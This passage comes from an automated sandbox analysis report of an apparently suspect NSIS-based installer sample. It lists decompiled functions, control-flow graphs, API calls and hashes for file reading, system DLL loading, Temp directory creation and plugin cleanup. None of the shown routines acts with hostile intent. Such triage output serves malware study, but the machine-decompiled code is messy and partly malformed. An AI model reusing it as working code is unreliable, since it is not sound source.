                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll
                                                  • API String ID: 1495540970-2846481430
                                                  • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                  • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                  • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                  • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 649 4026ec-402705 call 402d84 652 402c2a-402c2d 649->652 653 40270b-402712 649->653 656 402c33-402c39 652->656 654 402714 653->654 655 402717-40271a 653->655 654->655 657 402720-40272f call 40649d 655->657 658 40287e-402886 655->658 657->658 662 402735 657->662 658->652 663 40273b-40273f 662->663 664 4027d4-4027d7 663->664 665 402745-402760 ReadFile 663->665 667 4027d9-4027dc 664->667 668 4027ef-4027ff call 4060b0 664->668 665->658 666 402766-40276b 665->666 666->658 670 402771-40277f 666->670 667->668 671 4027de-4027e9 call 40610e 667->671 668->658 676 402801 668->676 673 402785-402797 MultiByteToWideChar 670->673 674 40283a-402846 call 406484 670->674 671->658 671->668 673->676 677 402799-40279c 673->677 674->656 680 402804-402807 676->680 681 40279e-4027a9 677->681 680->674 683 402809-40280e 680->683 681->680 684 4027ab-4027d0 SetFilePointer MultiByteToWideChar 681->684 685 402810-402815 683->685 686 40284b-40284f 683->686 684->681 687 4027d2 684->687 685->686 688 402817-40282a 685->688 689 402851-402855 686->689 690 40286c-402878 SetFilePointer 686->690 687->676 688->658 691 40282c-402832 688->691 692 402857-40285b 689->692 693 40285d-40286a 689->693 690->658 691->663 694 402838 691->694 692->690 692->693 693->658 694->658
                                                  C-Code - Quality: 87%
                                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                  				intOrPtr _t65;
                                                  				intOrPtr _t66;
                                                  				intOrPtr _t72;
                                                  				void* _t76;
                                                  				void* _t79;
                                                  
                                                  				_t72 = __edx;
                                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                  				_t65 = 2;
                                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                  				_t66 = E00402D84(_t65);
                                                  				_t79 = _t66 - 1;
                                                  				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                  				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                  				if(_t79 < 0) {
                                                  					L36:
                                                  					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                  				} else {
                                                  					__ecx = 0x3ff;
                                                  					if(__eax > 0x3ff) {
                                                  						 *(__ebp - 0x44) = 0x3ff;
                                                  					}
                                                  					if( *__edi == __bx) {
                                                  						L34:
                                                  						__ecx =  *(__ebp - 0xc);
                                                  						__eax =  *(__ebp - 8);
                                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                  						if(_t79 == 0) {
                                                  							 *(_t76 - 4) = 1;
                                                  						}
                                                  						goto L36;
                                                  					} else {
                                                  						 *(__ebp - 0x38) = __ebx;
                                                  						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                  						if( *(__ebp - 0x44) > __ebx) {
                                                  							do {
                                                  								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                  									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                  										__eax = __ebp - 0x50;
                                                  										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                  											goto L34;
                                                  										} else {
                                                  											goto L21;
                                                  										}
                                                  									} else {
                                                  										goto L34;
                                                  									}
                                                  								} else {
                                                  									__eax = __ebp - 0x40;
                                                  									_push(__ebx);
                                                  									_push(__ebp - 0x40);
                                                  									__eax = 2;
                                                  									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                  									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                                  									if(__eax == 0) {
                                                  										goto L34;
                                                  									} else {
                                                  										__ecx =  *(__ebp - 0x40);
                                                  										if(__ecx == __ebx) {
                                                  											goto L34;
                                                  										} else {
                                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                  											 *(__ebp - 0x4c) = __ecx;
                                                  											 *(__ebp - 0x50) = __eax;
                                                  											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                  												L28:
                                                  												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                  											} else {
                                                  												__ebp - 0x50 = __ebp + 0xa;
                                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                  													L21:
                                                  													__eax =  *(__ebp - 0x50);
                                                  												} else {
                                                  													__edi =  *(__ebp - 0x4c);
                                                  													__edi =  ~( *(__ebp - 0x4c));
                                                  													while(1) {
                                                  														_t22 = __ebp - 0x40;
                                                  														 *_t22 =  *(__ebp - 0x40) - 1;
                                                  														__eax = 0xfffd;
                                                  														 *(__ebp - 0x50) = 0xfffd;
                                                  														if( *_t22 == 0) {
                                                  															goto L22;
                                                  														}
                                                  														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                  														__edi = __edi + 1;
                                                  														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                                  														__ebp - 0x50 = __ebp + 0xa;
                                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                  															continue;
                                                  														} else {
                                                  															goto L21;
                                                  														}
                                                  														goto L22;
                                                  													}
                                                  												}
                                                  												L22:
                                                  												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                  													goto L28;
                                                  												} else {
                                                  													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                  														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                  															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                  															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                  														} else {
                                                  															__ecx =  *(__ebp - 0xc);
                                                  															__edx =  *(__ebp - 8);
                                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                  														}
                                                  														goto L34;
                                                  													} else {
                                                  														__ecx =  *(__ebp - 0xc);
                                                  														__edx =  *(__ebp - 8);
                                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                  														 *(__ebp - 0x38) = __eax;
                                                  														if(__ax == __bx) {
                                                  															goto L34;
                                                  														} else {
                                                  															goto L26;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L37;
                                                  								L26:
                                                  								__eax =  *(__ebp - 8);
                                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                  						}
                                                  						goto L34;
                                                  					}
                                                  				}
                                                  				L37:
                                                  				return 0;
                                                  			}








                                                  0x004026ec
                                                  0x004026ee
                                                  0x004026f1
                                                  0x004026f3
                                                  0x004026f6
                                                  0x004026fb
                                                  0x004026ff
                                                  0x00402702
                                                  0x00402705
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x0040270b
                                                  0x0040270b
                                                  0x00402712
                                                  0x00402714
                                                  0x00402714
                                                  0x0040271a
                                                  0x0040287e
                                                  0x0040287e
                                                  0x00402881
                                                  0x00402886
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00000000
                                                  0x00402720
                                                  0x00402721
                                                  0x0040272c
                                                  0x0040272f
                                                  0x0040273b
                                                  0x0040273f
                                                  0x004027d7
                                                  0x004027ef
                                                  0x004027ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402745
                                                  0x00402745
                                                  0x00402748
                                                  0x00402749
                                                  0x0040274c
                                                  0x00402751
                                                  0x00402758
                                                  0x00402760
                                                  0x00000000
                                                  0x00402766
                                                  0x00402766
                                                  0x0040276b
                                                  0x00000000
                                                  0x00402771
                                                  0x00402771
                                                  0x00402779
                                                  0x0040277c
                                                  0x0040277f
                                                  0x0040283a
                                                  0x00402841
                                                  0x00402785
                                                  0x0040278b
                                                  0x00402797
                                                  0x00402801
                                                  0x00402801
                                                  0x00402799
                                                  0x00402799
                                                  0x0040279c
                                                  0x0040279e
                                                  0x0040279e
                                                  0x0040279e
                                                  0x004027a1
                                                  0x004027a6
                                                  0x004027a9
                                                  0x00000000
                                                  0x00000000
                                                  0x004027ab
                                                  0x004027ae
                                                  0x004027b6
                                                  0x004027c2
                                                  0x004027d0
                                                  0x00000000
                                                  0x004027d2
                                                  0x00000000
                                                  0x004027d2
                                                  0x00000000
                                                  0x004027d0
                                                  0x0040279e
                                                  0x00402804
                                                  0x00402807
                                                  0x00000000
                                                  0x00402809
                                                  0x0040280e
                                                  0x0040284f
                                                  0x00402871
                                                  0x00402878
                                                  0x0040285d
                                                  0x0040285d
                                                  0x00402860
                                                  0x00402863
                                                  0x00402866
                                                  0x00402866
                                                  0x00000000
                                                  0x00402817
                                                  0x00402817
                                                  0x0040281a
                                                  0x0040281d
                                                  0x00402823
                                                  0x00402827
                                                  0x0040282a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040282a
                                                  0x0040280e
                                                  0x00402807
                                                  0x0040277f
                                                  0x0040276b
                                                  0x00402760
                                                  0x00000000
                                                  0x0040282c
                                                  0x0040282c
                                                  0x0040282f
                                                  0x00402838
                                                  0x00000000
                                                  0x0040272f
                                                  0x0040271a
                                                  0x00402c33
                                                  0x00402c39

                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                    • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                  • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                  • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                  • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 695 40689a-4068ba GetSystemDirectoryW 696 4068bc 695->696 697 4068be-4068c0 695->697 696->697 698 4068d1-4068d3 697->698 699 4068c2-4068cb 697->699 701 4068d4-406907 wsprintfW LoadLibraryExW 698->701 699->698 700 4068cd-4068cf 699->700 700->701
                                                  C-Code - Quality: 100%
                                                  			E0040689A(intOrPtr _a4) {
                                                  				short _v576;
                                                  				signed int _t13;
                                                  				struct HINSTANCE__* _t17;
                                                  				signed int _t19;
                                                  				void* _t24;
                                                  
                                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                  				if(_t13 > 0x104) {
                                                  					_t13 = 0;
                                                  				}
                                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                  					_t19 = 1;
                                                  				} else {
                                                  					_t19 = 0;
                                                  				}
                                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                  				return _t17;
                                                  			}








                                                  0x004068b1
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068c0
                                                  0x004068d3
                                                  0x004068cd
                                                  0x004068cd
                                                  0x004068cd
                                                  0x004068ec
                                                  0x00406900
                                                  0x00406907

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                  • wsprintfW.USER32 ref: 004068EC
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                  • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                  • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 702 405a6e-405ab9 CreateDirectoryW 703 405abb-405abd 702->703 704 405abf-405acc GetLastError 702->704 705 405ae6-405ae8 703->705 704->705 706 405ace-405ae2 SetFileSecurityW 704->706 706->703 707 405ae4 GetLastError 706->707 707->705
                                                  C-Code - Quality: 100%
                                                  			E00405A6E(WCHAR* _a4) {
                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                  				int _t22;
                                                  				long _t23;
                                                  
                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                  				_v36.Owner = 0x4083f8;
                                                  				_v36.Group = 0x4083f8;
                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                  				_v36.Revision = 1;
                                                  				_v36.Control = 4;
                                                  				_v36.Dacl = 0x4083e8;
                                                  				_v16.nLength = 0xc;
                                                  				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                  				if(_t22 != 0) {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  				_t23 = GetLastError();
                                                  				if(_t23 == 0xb7) {
                                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                  						goto L1;
                                                  					}
                                                  					return GetLastError();
                                                  				}
                                                  				return _t23;
                                                  			}







                                                  0x00405a79
                                                  0x00405a7d
                                                  0x00405a80
                                                  0x00405a86
                                                  0x00405a8a
                                                  0x00405a8e
                                                  0x00405a96
                                                  0x00405a9d
                                                  0x00405aa3
                                                  0x00405aaa
                                                  0x00405ab1
                                                  0x00405ab9
                                                  0x00405abb
                                                  0x00000000
                                                  0x00405abb
                                                  0x00405ac5
                                                  0x00405acc
                                                  0x00405ae2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405ae4
                                                  0x00405ae8

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                  • GetLastError.KERNEL32 ref: 00405AC5
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                  • GetLastError.KERNEL32 ref: 00405AE4
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3449924974-3355392842
                                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                  • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                  • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 708 71081817-71081856 call 71081bff 712 7108185c-71081860 708->712 713 71081976-71081978 708->713 714 71081869-71081876 call 71082480 712->714 715 71081862-71081868 call 7108243e 712->715 720 71081878-7108187d 714->720 721 710818a6-710818ad 714->721 715->714 724 71081898-7108189b 720->724 725 7108187f-71081880 720->725 722 710818cd-710818d1 721->722 723 710818af-710818cb call 71082655 call 71081654 call 71081312 GlobalFree 721->723 729 7108191e-71081924 call 71082655 722->729 730 710818d3-7108191c call 71081666 call 71082655 722->730 746 71081925-71081929 723->746 724->721 731 7108189d-7108189e call 71082e23 724->731 727 71081888-71081889 call 71082b98 725->727 728 71081882-71081883 725->728 742 7108188e 727->742 734 71081890-71081896 call 71082810 728->734 735 71081885-71081886 728->735 729->746 730->746 739 710818a3 731->739 745 710818a5 734->745 735->721 735->727 739->745 742->739 745->721 750 7108192b-71081939 call 71082618 746->750 751 71081966-7108196d 746->751 758 7108193b-7108193e 750->758 759 71081951-71081958 750->759 751->713 756 7108196f-71081970 GlobalFree 751->756 756->713 758->759 760 71081940-71081948 758->760 759->751 761 7108195a-71081965 call 710815dd 759->761 760->759 762 7108194a-7108194b FreeLibrary 760->762 761->751 762->759
                                                  C-Code - Quality: 88%
                                                  			E71081817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                  				void _v36;
                                                  				char _v136;
                                                  				struct HINSTANCE__* _t37;
                                                  				void* _t39;
                                                  				intOrPtr _t42;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				void* _t54;
                                                  				intOrPtr _t57;
                                                  				signed int _t61;
                                                  				signed int _t63;
                                                  				void* _t67;
                                                  				void* _t68;
                                                  				void* _t72;
                                                  				void* _t76;
                                                  
                                                  				_t76 = __esi;
                                                  				_t68 = __edi;
                                                  				_t67 = __edx;
                                                  				 *0x7108506c = _a8;
                                                  				 *0x71085070 = _a16;
                                                  				 *0x71085074 = _a12;
                                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x71085048, E71081651);
                                                  				_push(1);
                                                  				_t37 = E71081BFF();
                                                  				_t54 = _t37;
                                                  				if(_t54 == 0) {
                                                  					L28:
                                                  					return _t37;
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                  						E7108243E(_t54);
                                                  					}
                                                  					_push(_t54);
                                                  					E71082480(_t67);
                                                  					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                  					if(_t57 == 0xffffffff) {
                                                  						L14:
                                                  						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                  							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                  								_push(_t54);
                                                  								_t37 = E71082655();
                                                  							} else {
                                                  								_push(_t76);
                                                  								_push(_t68);
                                                  								_t61 = 8;
                                                  								_t13 = _t54 + 0x1018; // 0x1018
                                                  								memcpy( &_v36, _t13, _t61 << 2);
                                                  								_t42 = E71081666(_t54,  &_v136);
                                                  								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                  								_t18 = _t54 + 0x1018; // 0x1018
                                                  								_t72 = _t18;
                                                  								_push(_t54);
                                                  								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                  								 *_t72 = 4;
                                                  								E71082655();
                                                  								_t63 = 8;
                                                  								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                  							}
                                                  						} else {
                                                  							_push(_t54);
                                                  							E71082655();
                                                  							_t37 = GlobalFree(E71081312(E71081654(_t54)));
                                                  						}
                                                  						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                  							_t37 = E71082618(_t54);
                                                  							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                  								_t37 =  *(_t54 + 0x1008);
                                                  								if(_t37 != 0) {
                                                  									_t37 = FreeLibrary(_t37);
                                                  								}
                                                  							}
                                                  							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                  								_t37 = E710815DD( *0x71085068);
                                                  							}
                                                  						}
                                                  						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                  							goto L28;
                                                  						} else {
                                                  							_t39 = GlobalFree(_t54); // executed
                                                  							return _t39;
                                                  						}
                                                  					}
                                                  					_t48 =  *_t54;
                                                  					if(_t48 == 0) {
                                                  						if(_t57 != 1) {
                                                  							goto L14;
                                                  						}
                                                  						E71082E23(_t54);
                                                  						L12:
                                                  						_t54 = _t48;
                                                  						L13:
                                                  						goto L14;
                                                  					}
                                                  					_t49 = _t48 - 1;
                                                  					if(_t49 == 0) {
                                                  						L8:
                                                  						_t48 = E71082B98(_t57, _t54); // executed
                                                  						goto L12;
                                                  					}
                                                  					_t50 = _t49 - 1;
                                                  					if(_t50 == 0) {
                                                  						E71082810(_t54);
                                                  						goto L13;
                                                  					}
                                                  					if(_t50 != 1) {
                                                  						goto L14;
                                                  					}
                                                  					goto L8;
                                                  				}
                                                  			}



















                                                  0x71081817
                                                  0x71081817
                                                  0x71081817
                                                  0x71081824
                                                  0x7108182c
                                                  0x71081839
                                                  0x71081847
                                                  0x7108184a
                                                  0x7108184c
                                                  0x71081851
                                                  0x71081856
                                                  0x71081978
                                                  0x71081978
                                                  0x7108185c
                                                  0x71081860
                                                  0x71081863
                                                  0x71081868
                                                  0x71081869
                                                  0x7108186a
                                                  0x71081870
                                                  0x71081876
                                                  0x710818a6
                                                  0x710818ad
                                                  0x710818d1
                                                  0x7108191e
                                                  0x7108191f
                                                  0x710818d3
                                                  0x710818d3
                                                  0x710818d4
                                                  0x710818dd
                                                  0x710818de
                                                  0x710818e8
                                                  0x710818eb
                                                  0x710818f0
                                                  0x710818f7
                                                  0x710818f7
                                                  0x710818fd
                                                  0x710818fe
                                                  0x71081904
                                                  0x7108190a
                                                  0x71081917
                                                  0x71081918
                                                  0x7108191b
                                                  0x710818af
                                                  0x710818af
                                                  0x710818b0
                                                  0x710818c5
                                                  0x710818c5
                                                  0x71081929
                                                  0x7108192c
                                                  0x71081939
                                                  0x71081940
                                                  0x71081948
                                                  0x7108194b
                                                  0x7108194b
                                                  0x71081948
                                                  0x71081958
                                                  0x71081960
                                                  0x71081965
                                                  0x71081958
                                                  0x7108196d
                                                  0x00000000
                                                  0x7108196f
                                                  0x71081970
                                                  0x00000000
                                                  0x71081970
                                                  0x7108196d
                                                  0x7108187a
                                                  0x7108187d
                                                  0x7108189b
                                                  0x00000000
                                                  0x00000000
                                                  0x7108189e
                                                  0x710818a3
                                                  0x710818a3
                                                  0x710818a5
                                                  0x00000000
                                                  0x710818a5
                                                  0x7108187f
                                                  0x71081880
                                                  0x71081888
                                                  0x71081889
                                                  0x00000000
                                                  0x71081889
                                                  0x71081882
                                                  0x71081883
                                                  0x71081891
                                                  0x00000000
                                                  0x71081891
                                                  0x71081886
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x71081886

                                                  APIs
                                                    • Part of subcall function 71081BFF: GlobalFree.KERNEL32(?), ref: 71081E74
                                                    • Part of subcall function 71081BFF: GlobalFree.KERNEL32(?), ref: 71081E79
                                                    • Part of subcall function 71081BFF: GlobalFree.KERNEL32(?), ref: 71081E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 710818C5
                                                  • FreeLibrary.KERNEL32(?), ref: 7108194B
                                                  • GlobalFree.KERNELBASE(00000000), ref: 71081970
                                                    • Part of subcall function 7108243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7108246F
